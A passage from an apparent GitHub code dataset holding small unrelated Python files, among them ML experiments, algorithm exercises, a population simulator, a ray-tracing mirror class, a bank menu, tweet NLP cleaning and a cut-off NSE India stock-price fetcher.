compute_save_metrics(args.max_seq_len,\n args.nn_model,\n target_val, y_pred_binary,\n sequence_length_val,\n rep_token_pos_val)\n\n print(\"The balanced accuracy is {}\".format(balanced_accuracy))\n\n # we need to calculate p(recall) only for positive instances, whether the\n # model is able to recall a previously seen item or not, so remove the\n # negative instances : where the query token is not previously seen by the\n # model\n negative_samples = np.where(target_val == 0)\n\n\n target_val_pos_samples = np.delete(target_val, negative_samples[0])\n y_pred_pos_samples = np.delete(y_pred_continuous, negative_samples[0])\n y_pred_binary_pos_samples = np.delete(y_pred_binary, negative_samples[0])\n dist_pos_samples = np.delete(dist_test, negative_samples[0])\n seq_len_test_pos_samples = np.delete(sequence_length_val, negative_samples[0])\n\n\n # learn which kernel best models the test accuracy\n print(\"Finding the best kernel to model the test accuracy\")\n kernel, tau = kernel_matching(target_val_pos_samples, y_pred_pos_samples,\n dist_pos_samples, seq_len_test_pos_samples,\n y_pred_binary_pos_samples)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--nn_model\", default=\"lstm\", type=str,\n help=\"neural network model to be used\")\n parser.add_argument(\"--epochs\", default=1, type=int,\n help=\"Number of epochs to be run for\")\n parser.add_argument(\"--batch_size\", default=50, type=int,\n help=\"Number of samples in one batch\")\n parser.add_argument(\"--latent_dim\", default=256, type=int,\n help=\"size of the memory encoding\")\n parser.add_argument(\"--padding\", default=\"post_padding\", type=str,\n help=\"Type of padding, pre-padding or \"\n \"post-padding\")\n parser.add_argument(\"--max_seq_len\", default=26, type=int,\n help=\"Maximum sequence length\")\n parser.add_argument(\"--debug\", type=int, default=1, help=\"is it debug\")\n args = parser.parse_args()\n\n print(args)\n\n main(args)\n","repo_name":"SherinBojappa/Memory","sub_path":"memory_encoder_mlp.py","file_name":"memory_encoder_mlp.py","file_ext":"py","file_size_in_byte":36253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28932318296","text":"\"\"\"\nSmall example doing data filtering on digits for t-SNE embedding.\n\"\"\"\nfrom time import time\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn import manifold, datasets, decomposition, pipeline\n\nfrom outlier_filtering import EllipticEnvelopeFilter\nfrom subsampler import SubSampler\n\ndigits = datasets.load_digits()\nX = digits.data\ny = digits.target\nn_samples, n_features = X.shape\n\n\n#----------------------------------------------------------------------\n# Scale and visualize the embedding vectors\ndef plot_embedding(X, y, title=None):\n x_min, x_max = np.min(X, 0), np.max(X, 0)\n X = (X - x_min) / (x_max - x_min)\n\n plt.figure()\n plt.subplot(111)\n for this_x, this_y in zip(X, y):\n plt.text(this_x[0], this_x[1], str(this_y),\n color=plt.cm.Set1(this_y / 10.),\n fontdict={'weight': 'bold', 'size': 9})\n\n plt.xticks([]), plt.yticks([])\n if title is not None:\n plt.title(title)\n\n\nprint(\"Computing t-SNE embedding\")\n\ntsne = manifold.TSNE(n_components=2, init='pca', random_state=0)\n\nsubsampler = SubSampler(random_state=1, ratio=.5)\n\nfiltering = EllipticEnvelopeFilter(random_state=1)\n\nt0 = time()\n\n# We need a PCA reduction of X because MinCovDet crashes elsewhere\nX_pca = decomposition.RandomizedPCA(n_components=30).fit_transform(X)\nfiltering.fit_pipe(*subsampler.transform_pipe(X_pca))\n\nprint(\"Fitting filtering done: %.2fs\" % (time() - t0))\n\nX_red, y_red = filtering.transform_pipe(X_pca, y)\n\nX_tsne = tsne.fit_transform(X_red)\n\nplot_embedding(X_tsne, y_red,\n \"With outlier_filtering\")\n\n\n# Now without outlier_filtering\nX_tsne = tsne.fit_transform(X_pca)\n\nplot_embedding(X_tsne, y,\n \"Without outlier_filtering\")\n\nplt.show()\n\n","repo_name":"scikit-learn/enhancement_proposals","sub_path":"slep001/example_outlier_digits.py","file_name":"example_outlier_digits.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"68"} +{"seq_id":"43039931834","text":"def paul(x):\n # your code here\n kata = x.count(\"kata\") * 5\n petesKata = x.count('Petes kata') * 10\n eating = x.count('eating')\n total = kata + petesKata + eating\n \n if (total < 40):\n return \"Super happy!\"\n elif (40 <= total < 70):\n return \"Happy!\"\n elif (70 <= total < 100):\n return \"Sad!\"\n else:\n return 'Miserable!'\n\nprint(paul(['life', 'eating', 'life']))\nprint(paul(['life', 'kata', 'life', 'kata', 'eating', 'Petes kata', 'eating', 'life', 'Petes kata', 'life']))","repo_name":"JHanek3/CodeWars","sub_path":"py/pauls_misery.py","file_name":"pauls_misery.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9520549307","text":"#!/usr/bin/python\n\nimport os\nimport sys\nfrom pathlib import Path\n\ndef get_template_dir():\n home = os.path.expanduser('~')\n path = Path(home + '/.md2x/beamer-skeleton')\n if path.exists():\n return str(path)\n \n root = os.path.dirname(__file__).replace(os.sep, '/')\n path = Path(root + '/beamer-skeleton')\n if path.exists():\n print(path.name)\n return str(path)\n \n print('No template directory. Aborted.', file=sys.stderr)\n exit(1)\n\ndef copy_templates(template_dir, dirs):\n for a in dirs:\n p = Path(a)\n if not p.exists():\n p.mkdir()\n else:\n print(f'The directory already exists: {a}')\n\n with open(template_dir + '/Makefile', encoding='shift_jis') as fi:\n str = fi.read()\n str = str.replace('{slide_skeleton}', a)\n with open(a + '/Makefile', 'w', encoding='shift_jis') as fo:\n fo.write(str)\n\n with open(template_dir + '/config.json', encoding='utf-8') as fi:\n str = fi.read()\n with open(a + '/config.json', 'w', encoding='utf-8') as fo:\n fo.write(str)\n\n with open(template_dir + '/slide-skeleton.md', encoding='utf-8') as fi:\n str = fi.read()\n with open(a + '/' + a + '.md', 'w', encoding='utf-8') as fo:\n fo.write(str)\n\ndef main():\n copy_templates(get_template_dir(), sys.argv[1:])\n return 0\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"circleratio/md2x","sub_path":"bmconfig.py","file_name":"bmconfig.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4672128334","text":"def delete_node():\n value = list(map(int, input().split()))\n\n lstr = []\n lstr.append(value[1])\n target = value[-1]\n for i in range(2, value[0] * 2 - 1, 2):\n index = lstr.index(value[i + 1])\n new_value_prefix = lstr[:index + 1]\n new_value_suffix = lstr[index + 1:]\n new_value_prefix.append(value[i])\n lstr = new_value_prefix + new_value_suffix\n\n ind = lstr.index(target)\n lstr.pop(ind)\n return lstr\n\n\nif __name__ == '__main__':\n while 1:\n try:\n res = delete_node()\n print(\" \".join(map(str, res)))\n except Exception:\n break\n","repo_name":"heavens420/base","sub_path":"algorithm/从单向链表中删除指定节点.py","file_name":"从单向链表中删除指定节点.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"33170945922","text":"def merge_sort(alist):\n \"\"\"归并排序\n 归并排序不改变原列表,而是重新生成一个列表\n 最优时间复杂度和最坏时间复杂度都是 O(nlogn)\n 是稳定性排序\n \"\"\"\n n = len(alist)\n if n == 1:\n return alist\n mid = n // 2 # 将列表分为两个部分\n left_sorted_li = merge_sort(alist[:mid]) # 对左半部分进行归并排序\n right_sorted_li = merge_sort(alist[mid:]) # 对右半部分进行归并排序\n\n # 合并两个有序集合\n left, right = 0, 0\n merge_sort_li = [] # 将合并后的列表生成一个新列表\n\n left_n = len(left_sorted_li)\n right_n = len(right_sorted_li)\n\n while left < left_n and right < right_n:\n if left_sorted_li[left] <= right_sorted_li[right]:\n merge_sort_li.append(left_sorted_li[left])\n left += 1\n else:\n merge_sort_li.append(right_sorted_li[right])\n right += 1\n # 当有一边所有元素全部添加到新列表时\n merge_sort_li += left_sorted_li[left:]\n merge_sort_li += right_sorted_li[right:]\n\n return merge_sort_li\n\n\nif __name__ == '__main__':\n alist = [2, 5, 91, 38, 45, 1, 9, 0, 10]\n print(alist)\n print(merge_sort(alist))\n print(alist)\n","repo_name":"wujarvis/leetcode","sub_path":"sort/归并排序.py","file_name":"归并排序.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71754455576","text":"#coding=utf-8\n# class Solution:\n# def twoSum(self, nums, target):\n# \"\"\"\n# :type nums: List[int]\n# :type target: int\n# :rtype: List[int]\n# \"\"\"\n# for i in nums:\n# other_num = target - i\n# if other_num in nums:\n# if other_num != i:return [nums.index(i),nums.index(other_num)]\n# else:\n# iindex = nums.index(i)\n# llist = nums[iindex+1:]\n# if other_num in llist:\n# return [iindex,llist.index(i)+iindex+1]\n# return('没有匹配的数字')\n\nclass Solution:\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n for i in range(len(nums)):\n other_num = target - nums[i]\n if other_num in nums:\n if other_num != nums[i]:return [i,nums.index(other_num)]\n else:\n llist = nums[i+1:]\n if other_num in llist:\n return [i,llist.index(other_num)+i+1]\n return('没有匹配的数字')\n\nnums = [2, 3,5,7, 11, 15]\ntarget = 10\ntwosum = Solution()\nprint(twosum.twoSum(nums,target))\n","repo_name":"tianjinqiujie/LeetCode","sub_path":"LeetCode/1. Two_Sum.py","file_name":"1. Two_Sum.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39686973266","text":"class ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n def print(self):\n print(\"Node(\" + str(self.val) + \")\", end=\"\")\n if self.next is not None:\n print(\" -> \", end =\"\")\n self.next.print()\n\n# Problem code\ndef addTwoNumbers(l1: ListNode, l2: ListNode) -> ListNode:\n if not l1 and not l2:\n return None\n carry = 0\n dummy = ListNode(0)\n cur = dummy\n while l1 or l2 or carry > 0:\n v1 = l1.val if l1 else 0\n v2 = l2.val if l2 else 0\n l1 = l1.next if l1 else None\n l2 = l2.next if l2 else None\n result = v1 + v2 + carry\n carry = 0\n if result > 9:\n carry = 1\n result = result % 10\n cur.next = ListNode(result)\n cur = cur.next\n return dummy.next\n\n# Setup\na = ListNode(9)\nb = ListNode(9)\nc = ListNode(1)\n\nd = ListNode(1)\ne = ListNode(2)\na.next = b\nb.next = c\n\nd.next = e\n\nprint(\"\")\nprint(\"Adding two numbers:\")\na.print()\nprint(\"\\n\")\nd.print()\nresult = addTwoNumbers(a, d)\nprint(\"\\n\")\nprint(\"After adding:\")\nresult.print()\n","repo_name":"Voley/AlgorithmicProblemsV2","sub_path":"LinkedLists/add/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"10158681873","text":"import numpy as np\nfrom faker import Faker\nimport random\nimport matplotlib.pyplot as plt\nimport networkx as nx\nfrom collections import Counter\n\nfake = Faker()\n\ndebug = False\n\n\"\"\"\n\nImplement genetics system: \n inherit good or bad traits\n eugenics pushes for good traits\n but small gene pool makes emergence of bad traits more likely\n\n\"\"\"\n\nclass Person:\n ID = 0\n\n def __init__(self, age):\n Person.ID += 1\n self.ID = Person.ID\n self.age = age\n self._surname = None\n # Define is_child based on age\n self.is_child = True if self.age < 18 else False\n # 50/50 gender probability\n self.gender = random.choice([\"male\", \"female\"])\n if self.gender == \"male\":\n self.first_name = fake.first_name_male()\n elif self.gender == \"female\":\n self.first_name = fake.first_name_female()\n self.name = self.first_name\n\n @property\n def surname(self):\n return self._surname\n\n @surname.setter\n def surname(self, value):\n self._surname = value\n if self._surname is not None:\n self.name = self.first_name + \" \" + self._surname\n\n # Recent stats: 3% of population is homosexual and 4% is bisexual\n orientation_prob = random.random()\n if orientation_prob < 0.03:\n orientation = \"homosexual\"\n elif orientation_prob < 0.07:\n orientation = \"bisexual\"\n else:\n orientation = \"heterosexual\"\n self.orientation = orientation\n\n if self.orientation == \"heterosexual\":\n if self.gender == \"male\":\n self.spouse_gender = \"female\"\n else:\n self.spouse_gender = \"male\"\n elif self.orientation == \"homosexual\":\n if self.gender == \"male\":\n self.spouse_gender = \"male\"\n else:\n self.spouse_gender = \"female\"\n else:\n self.spouse_gender = [\"male\", \"female\"]\n\n if self.age < 18:\n self.is_child = True\n else:\n self.is_child = False\n\n self.spouse = None\n self.parents = []\n self.children = []\n\n\nclass Family:\n def __init__(self, parents, surname):\n self.parents = parents\n self.surname = surname\n self.children = []\n\n def add_child(self, child):\n self.children.append(child)\n for parent in self.parents:\n parent.children.append(child)\n\n\ndef simulate_population(population_size, initial_family_count, debug, time_steps):\n fake = Faker()\n Faker.seed(0) # Set seed for consistent data generation\n\n population = []\n families = []\n step = 0\n AVG_LIFESPAN = 80 + (step // 10)\n\n\n\n\n # Initialize the population\n print(\"Initializing the population...\")\n print(\"Initializing age distribution...\")\n age_distribution = [random.randint(0, 15) for _ in range(int(population_size * 0.55))] + [random.randint(35, 60) for\n _ in range(int(population_size * 0.45))]\n\n surnames = set()\n # Populate array of unique surnames\n while len(surnames) < population_size / 2:\n surname = fake.last_name()\n if surname not in surnames:\n surnames.add(surname)\n\n if debug:\n print(f\"{len(surnames)} total surnames generated. \")\n for surname in surnames:\n print(surname)\n\n print(\"Initializing raw population...\")\n debug_counter = 0\n for i in range(population_size):\n # Initialize the population with age according to the age distribution\n age = age_distribution[i]\n # Initialize person\n person = Person(age)\n # Add person to population\n population.append(person)\n\n # Give adults a surname\n if person.is_child is False:\n try:\n print(list(surnames))\n person.surname = random.choice(list(surnames))\n # Remove surname from pool once assigned to assure uniqueness\n surnames.remove(person.surname)\n except:\n print(\"Error: Not enough surnames to assign to population. Len: \" + str(len(surnames)))\n exit(1)\n else:\n person.surname = None\n\n if debug:\n debug_counter+=1\n print(f\"{debug_counter} Surname assigned: \" + person.name)\n\n\n\n counter = Counter(person.surname for person in population)\n duplicates = [item for item, count in counter.items() if count > 1 and item is not None and item is not True]\n if debug:\n print(\"duplicates = \" + str(duplicates))\n if len(duplicates) > 0:\n print(\"Error: Duplicate surnames detected: \" + str(len(duplicates)) + ' ' + str(duplicates))\n exit(1)\n\n for person in population:\n if person.is_child is False:\n print(person.name)\n\n # DEBUG: Print population statistics\n\n\n # if debug is True:\n # # for person in population:\n # # print(person.name + ' ' + str(person.age))\n # max_age = max(person.age for person in population)\n # print(f\"Minimum age: {min(person.age for person in population)}\")\n # print(f\"Maximum age: {max_age}\")\n # age_histogram = [0] * (max_age + 1)\n # orientation_histogram = [0] * 3\n #\n # for person in population:\n # if person.age <= max_age:\n # age_histogram[person.age] += 1\n # else:\n # age_histogram.append(1)\n # max_age += 1\n #\n # plt.bar(range(len(age_histogram)), age_histogram)\n # plt.xlabel('Age')\n # plt.ylabel('Population Count')\n # plt.title('Population Demographics by Age, Initial Population')\n # plt.show()\n #\n # total_males = 0\n # for person in population:\n # if person.gender == \"male\":\n # total_males += 1\n # print(f\"Total males: {total_males}\\nTotal females: {500 - total_males}\\nGender ratio: {total_males / 500}\")\n #\n # for person in population:\n # if person.orientation == \"heterosexual\":\n # orientation_histogram[0] += 1\n # elif person.orientation == \"homosexual\":\n # orientation_histogram[1] += 1\n # else:\n # orientation_histogram[2] += 1\n #\n # labels = [\"heterosexual\", \"homosexual\", \"bisexual\"]\n # x = range(len(orientation_histogram))\n # plt.bar(x, orientation_histogram, tick_label=labels)\n # plt.show()\n\n # Simulate population dynamics for the given number of time steps (years)\n print(\"Simulating population dynamics...\")\n max_age = max(person.age for person in population)\n age_histogram = [0] * (max_age + 1)\n for step in range(time_steps):\n print(f\"Simulating year {step}...\")\n # Update ages and track demographics\n print(\"Aging population...\")\n for person in population:\n person.age += 1\n if person.age <= max_age:\n age_histogram[person.age] += 1\n else:\n age_histogram.append(1)\n max_age += 1\n\n # Determine who dies (based on age and life expectancy)\n # Define Gompertz-Makeham parameters\n alpha = 0.05 # Baseline mortality rate\n beta = 0.001 # Rate of age-related increase in mortality\n\n print(\"Determining mortality due to old age...\")\n # Determine who dies based on age and Gompertz-Makeham distribution\n for family in families:\n for parent in family.parents:\n age_difference = parent.age - AVG_LIFESPAN\n if age_difference >= 0:\n survival_probability = np.exp(alpha + beta * age_difference)\n if random.random() > survival_probability:\n family.parents.remove(parent)\n population.remove(parent)\n print(f\"{parent.first_name} {parent.surname} died at age {parent.age}\")\n\n\n print(\"Generating families...\")\n # Allow couples to form families and have children\n eligible_parents = [person for person in population if 20 <= person.age <= 50]\n print(\"Generating parenting couples...\")\n parents = []\n print(\", \" .join(person.name for person in eligible_parents))\n while len(eligible_parents) >= 2:\n\n while True:\n print(\"Choosing first parent...\")\n parents.append(random.choice(eligible_parents))\n print(f\"Parent: {parents[0].name}, {parents[0].age}, {parents[0].orientation}\\n\\n\")\n print(\"Eligible parents: \" + str(len(eligible_parents)))\n while True:\n parents.append(random.choice(eligible_parents))\n for person in parents:\n print(f\"Person: {person.name}, {person.age}, {person.orientation}, {person.spouse_gender}\")\n\n if debug is True:\n if len(parents) == 2:\n print(\"First parent gender:\", parents[0].gender)\n print(\"First parent spouse gender:\", parents[0].spouse_gender)\n print(\"Second parent gender:\", parents[1].gender)\n print(\"Second parent spouse gender:\", parents[1].spouse_gender)\n\n\n if parents[1].gender in parents[0].spouse_gender and parents[0].gender in parents[1].spouse_gender:\n print(\"Eligible\\n\")\n\n eligible_parents.remove(parents[0])\n eligible_parents.remove(parents[1])\n break\n else:\n print(\"Not eligible\\n\")\n parents.remove(parents[1])\n\n if parents[0].gender in parents[1].spouse_gender and parents[1].gender in parents[0].spouse_gender:\n print(\"Couple formed!\")\n # If hetero, assign male surname, otherwise doesn't matter\n if parents[0].gender == \"male\":\n parents[1].surname = parents[0].surname\n else:\n parents[0].surname = parents[1].surname\n for parent in parents:\n print(f\"{parent.name}, {parent.age}, {parent.orientation}\")\n family_surname = parents[0].surname\n\n print(\"Remaining eligible parents: \" + str(len(eligible_parents)))\n if len(parents) != 2:\n print(\"Parents need to be two. Resetting...\")\n parents = []\n continue\n break\n\n\n # Assign spouses\n if len(parents) != 2:\n exit(1)\n parents[0].spouse = parents[1]\n parents[1].spouse = parents[0]\n\n family = Family(parents, family_surname)\n families.append(family)\n\n # Assigned any children without parents to this family, up to 3\n print(\"Assigning children to family...\")\n for person in population:\n # If child without parents, assign to family\n if person.is_child is True and person.parents == []:\n person.parents = parents\n # Patriarchal surname assignment\n if parents[0].gender == \"male\":\n person.surname = parents[0].surname\n else:\n person.surname = parents[1].surname\n # Add child to family\n family.add_child(person)\n print(f\"Assigned {person.name} to family {family_surname}\")\n # If family has 3 children, stop assigning children to this family\n if len(family.children) >= 3:\n break\n\n\n # if population capacity not yet reached, have children\n if len(population) < population_size:\n print(\"Adding children to the population...\")\n child_surname = family_surname\n child = Person(0, child_surname)\n family.add_child(child)\n population.append(child)\n eligible_parents.append(child)\n print(f\"{parents[0].name} and {parents[1].name} had a baby named {child.first_name}!\")\n\n # Print family lineages\n if step % 10 == 0:\n print(f\"Family Lineages at Year {step}:\")\n for i, family in enumerate(families):\n if i >= 10:\n break\n print(f\"Couples: {', '.join([parent.name for parent in family.parents])}\")\n for child in family.children:\n print(f\" Child: {child.name} ({child.gender})\")\n\n # Plot age histogram\n plt.bar(range(len(age_histogram)), age_histogram)\n plt.xlabel('Age')\n plt.ylabel('Population Count')\n plt.title('Population Demographics by Age')\n plt.show()\n\n # View lineage of a person\n def view_lineage(person):\n G = nx.DiGraph()\n\n # Create nodes for each person\n for p in population:\n G.add_node(p.name)\n\n # Create edges for family relationships\n for family in families:\n for child in family.children:\n parent1_name = family.parents[0].name\n parent2_name = family.parents[1].name\n child_name = child.name\n G.add_edge(parent1_name, child_name)\n G.add_edge(parent2_name, child_name)\n\n # Draw family tree\n pos = nx.spring_layout(G)\n nx.draw_networkx(G, pos=pos, with_labels=True)\n plt.axis('off')\n plt.show()\n\n # Select a person and view their lineage\n if len(population) > 0:\n selected_person = random.choice(population)\n view_lineage(selected_person)\n\n\n# Run the simulation\npopulation_size = 500\ninitial_family_count = 112\nfamily_size = 4.5\ntime_steps = 100\n\nsimulate_population(population_size, initial_family_count, family_size, time_steps)\n","repo_name":"Von-R/Generational-Simulator","sub_path":"Pop_sim.py","file_name":"Pop_sim.py","file_ext":"py","file_size_in_byte":14095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21521981673","text":"# the mirrors that we can use in the environment\nimport random as R\nfrom vector import vector as V\nimport numpy as np\n\nclass mirrors:\n\n #PRE: T is the type of the mirror to make\n # S is the size of the mirror to make\n # O is the surfaces overall orientation vector with 0 z component\n # L is location as vector to top left corner\n #POST: creates an NxN array of vectors relative to the mirror surface which\n # represent the normal to the plane.\n def __init__(self, T, S, O=V.vector(0,0,1), L=V.vector(0,0,0)):\n self.seed = 123456\n self.size = S\n self.orientation = V.vector(O[0], O[1], O[2])\n self.top_left = L\n # this is the direction the pixels are moving from \"0,0\" of the mirror\n # we assume that all elements have 0 z component for their orientation,\n # and as such, [0,0,1] is orthogonal to self.orientation\n out = np.cross(self.orientation.vec, [0,0,1])\n self.right_vec = V.vector(out[0],out[1],out[2])\n #self.right_vec is a vector of the direction of pixels following the\n #right of the top left since cross products follow the right hand rule\n if (T == True):\n self.sheet = self.makeGlitter()\n else:\n self.sheet = self.makeFlat()\n\n #PRE: initially assumes the orientation of the sheet to be [0 0 1]\n # and rotates via the vector rotate method the reflector to the correct\n # orientation in a 3D environment\n #POST: makes a sheet of glitter oriented to the space\n def makeGlitter(self):\n R.seed(self.seed)\n paper = []\n for i in range(0,self.size):\n row = []\n for j in range(0,self.size):\n mx = float(format(R.uniform(-1,1),'.2'))\n my = float(format(R.uniform(-1,1),'.2'))\n mz = np.absolute(float(format(R.uniform(-1,1),'.2')))\n reflector = V.vector(mx, my, mz)\n # reflector = reflector.unit() # not necessary\n cos_theta = (reflector.dotProduct(self.orientation.vec)/\n (reflector.magnitude()*np.linalg.norm(self.orientation.vec)))\n theta = np.degrees(np.arccos(cos_theta))\n u = reflector.crossProduct(self.orientation.vec).unit()\n # u is perpendicular to the reflector and the axis of ratation\n reflector.rotate(u,theta)\n row.append(reflector)\n paper.append(row)\n return paper\n\n def makeFlat(self):\n paper = []\n f = [0,0,1] # surface normal of flat mirror with frame of reference\n # +z away from overall orientation\n reflector = V.vector(f[0],f[1],f[2])\n cos_theta = (reflector.dotProduct(self.orientation)/(reflector.magnitude()*np.linalg.norm(self.orientation.vec)))\n theta = np.degrees(np.arccos(cos_theta))\n # print(\"theta: \",theta)\n u = reflector.crossProduct(self.orientation).unit()\n # print(\"unit axis of rotation: \",str(u))\n # u is perpendicular to the reflector and the axis of rotation\n # print(\"pre-rotation: \",str(reflector))\n reflector.rotate(u,theta)\n # print(\"post-rotation: \",str(reflector))\n for i in range(0,self.size):\n row = []\n for j in range(0,self.size):\n row.append(reflector)\n paper.append(row)\n return paper\n\n\n # Writing a pixel by pixel color representation of the mirror surface.\n # R, G, -1 and 1, -1 is 0, 1 is 300, 0 is 150\n # B, 0 and 1, 0 is 0, 1 is 300\n # writing as a .ppm file\n def draw_img(self):\n # proper .ppm header\n print_str = \"P3\\n\"+str(self.size)+\" \"+str(self.size)+\"\\n300\\n\"\n\n for i in range(0,self.size):\n for j in range(0,self.size):\n r = int(np.ceil((np.absolute(self.sheet[i][j].x))*300))\n g = int(np.ceil((np.absolute(self.sheet[i][j].y))*300))\n b = int(np.ceil((np.absolute(self.sheet[i][j].z))*300))\n color = str(r)+\" \"+str(g)+\" \"+str(b)+\"\\n\"\n # print(color)\n print_str += color\n img = open(\"mirror2.ppm\",\"r+\")\n # print(print_str)\n img.write(print_str)\n\n def __str__(self):\n print_str = \"\"\n for i in range(0,self.size):\n for j in range(0,self.size):\n print_str += str(self.sheet[i][j])+\"\\t\"\n print_str += \"\\n\"\n return print_str\n","repo_name":"jngetz/SparkleMind","sub_path":"ray_trace/environment/mirrors.py","file_name":"mirrors.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1883499428","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 22 01:58:56 2019\n\n@author: abdoulaziz\n\"\"\"\nfrom bank import Bank\n\n\n#==============================================================================\n# Important Note:\n# Create a Bank object call myBank\n#==============================================================================\nmyBank = Bank(\"myBank\")\n\n\n#==============================================================================\n# Important Note:\n# Ask customer to create a Bank account\n#==============================================================================\nprint(\"Enter your name and create an account\")\nprenom = input(\"First name :\")\nnom = input(\"Name :\")\nidc = myBank.create(nom, prenom)\nprint(\"Your customer number is :\", idc)\n\n \n#==============================================================================\n# Important Note:\n# display of a menu to allow the customer to perform operations\n#==============================================================================\nc = True\nwhile c :\n try : \n print(\"Welcome to your Bank :\")\n print(\"\\t 1.Consute my operations\")\n print(\"\\t 2.Withdraw from my account\")\n print(\"\\t 3.Deposit to my account\")\n print(\"\\t 4.Close\")\n choix = input(\"Write your choice number : \") \n choix = int(choix)\n if choix == 1:\n myBank.consulte(idc)\n elif choix == 2:\n amount = input(\"Write your amount :\")\n print(\"\\n\\n\")\n amount = int(amount)\n myBank.widthraw(idc, amount)\n elif choix == 3:\n amount = input(\"Write your amount :\")\n print(\"\\n\\n\")\n amount = int(amount)\n myBank.deposit(idc, amount)\n else :\n c = False\n except ValueError :\n print(\"You need to choose a number\\n\\n\") \n \n ","repo_name":"abdoul91/kataBank","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39413039810","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 14 09:54:44 2020\n\n@author: Victor HENRIO\n\"\"\"\n\nimport pandas as pd \nimport nltk \nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.corpus import stopwords\nimport spacy\nfrom spacy.lemmatizer import Lemmatizer\nfrom nltk.stem.porter import *\n\n\n\ndef tokenisation(text):\n text_trait = text.replace(\"'\",\" \").replace(\".\",\" \")\n texte_token = nltk.sent_tokenize(text_trait.lower())\n all_words = [nltk.word_tokenize(sent) for sent in texte_token]\n return all_words\n\n \ndef delete_stop_word(array_of_word):\n stop_words = stopwords.words('english') + [\",\", \".\", \"!\", \"?\", \";\", \"...\", \"'s\", \"--\", \"&\",\"'\",\"#\",\"@\",\"%\"] + [k for k in range(100)]\n for i in range(len(array_of_word)):\n array_of_word[i] = [w for w in array_of_word[i] if w not in stop_words]\n return array_of_word\n\n\ndef porterStemmerFct(array_of_word):\n #print(\"\\n\",\"#\"*40,\"\\n\",\"\\t PorterStemmerFct \\n\",\"#\"*40,\"\\n\")\n stemmer = PorterStemmer()\n singles = [stemmer.stem(plural) for plural in array_of_word[0]]\n return singles\n\ndef spacylemmatization(text):\n print(\"\\n\",\"#\"*40,\"\\n\",\"\\t Spacy Lemmatization \\n\",\"#\"*40,\"\\n\")\n nlp = spacy.load('fr_core_news_sm')\n text_nlp = nlp(text)\n for token in text_nlp :\n print (token, token.lemma_)\n\n\n\ndef clean_df(df):\n #Pas réussi à append les listes dans le df\n #cleaned_df = pd.DataFrame(columns=[\"content\"])\n cleaned_tab = []\n for index,tweet in df.itertuples():\n token_tweet = tokenisation(tweet)\n tweet_without_stpw = delete_stop_word(token_tweet)\n porter_tweet = porterStemmerFct(tweet_without_stpw) \n #cleaned_df['content'] = porter_tweet\n #cleaned_df[index].append(porter_tweet)\n cleaned_tab.append(porter_tweet)\n \n return cleaned_tab\n\n\n \n \n \nif __name__ == \"__main__\":\n \n df = pd.read_csv(\"data/1001tweets_on_bitcoin.csv\", sep=\"\\\\\", names=['Content'])\n clean = clean_df(df)\n ","repo_name":"Alex-bensimon/scraping_nlp_project","sub_path":"nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"18255522687","text":"\"\"\"\n======================\nNSE India Web Services\n======================\n\nEncapsulation for the services that communicate with nse india\n\"\"\"\n\nimport urllib\nimport pandas as pd\nfrom helper.util import resolve_config_value\nimport datetime\nimport requests\nfrom io import StringIO\nfrom bs4 import BeautifulSoup\n\nclass NseIndiaService:\n \"\"\"\n Functions\n =========\n\n get_historical_prices : Get historical prices of a stock for a given time frame\n \"\"\"\n\n def __init__(self):\n self.__config_details = resolve_config_value(['nse_india'])\n\n def get_historical_prices(self, stock_name: str, ct: datetime, pt: datetime)-> pd.DataFrame:\n \"\"\"\n Fetches the daily historical price for the stock for a given time frame\n\n Parameters\n ----------\n stock_name : str\n The nse ticker id.\n ct : datetime\n The current date which is the end time of the time frame.\n pt : datetime\n The date from where to get the historical prices.\n\n Returns\n -------\n df : dataframe\n The dataset contains the date and historical price of the stock.\n\n \"\"\"\n\n # change the timestamp to DD-MM-YYYY format\n ct = ct.strftime(\"%d-%m-%Y\")\n pt = pt.strftime(\"%d-%m-%Y\")\n\n head = {\n 'user-agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/87.0.4280.88 Safari/537.36 \"\n }\n\n base_url = self.__config_details['base_url']\n\n session = requests.session()\n session.get(base_url, headers=head)\n session.get(base_url + self.__config_details['stock_details'] + stock_name, headers=head) # to save cookies\n session.get(base_url + 